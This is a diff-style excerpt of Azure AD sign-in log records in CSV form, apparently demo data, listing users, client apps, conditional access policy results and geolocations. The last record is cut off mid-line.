+199,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:49.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 06:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",0d3dadc7-5b90-4194-87e2-04e075580400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0d3dadc7-5b90-4194-87e2-04e075580400,SigninLogs,Sucess,33.0175209,35.44601059
+200,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5c9ec8d9-47c7-436d-b040-36338b294696,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",22fd8c7c-75eb-4549-80fa-172714cb0400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,22fd8c7c-75eb-4549-80fa-172714cb0400,SigninLogs,Sucess,36.6404686,-78.26995087
+201,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:21.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d3dc6eea-2e84-4ae9-ae61-df87573d1ca9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",0184cc6e-10a2-4578-80c3-44b6e5571000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0184cc6e-10a2-4578-80c3-44b6e5571000,SigninLogs,Sucess,36.6404686,-78.26995087
+202,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,394bbbfa-32af-4cec-af63-76c2b73c929c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c79f4e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,24b904d7-063a-4f4c-9637-40c79f4e1500,SigninLogs,Sucess,41.90428925,-85.99833679
+203,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:43.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0dcda76f-7788-4b0d-a344-e9ef3281caf5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-10425cbe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,6c1d2f35-9fdd-4afe-865b-10425cbe1400,SigninLogs,Sucess,41.90428925,-85.99833679
+204,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:21.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,137457c8-73d8-4f06-a503-0f0ef1c070b1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",e073edf9-f5bb-4bea-bfc3-42662e701400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,e073edf9-f5bb-4bea-bfc3-42662e701400,SigninLogs,Sucess,33.7984581,-84.38828278
+205,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b02e3e55-34a0-4c8e-adc1-2f4b68964a07,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f81997e3-0b26-42cc-8532-c4def77e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f81997e3-0b26-42cc-8532-c4def77e1500,SigninLogs,Sucess,33.7984581,-84.38828278
+206,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:41.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42ec543f-db91-4d87-b07f-74fd67f40a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management 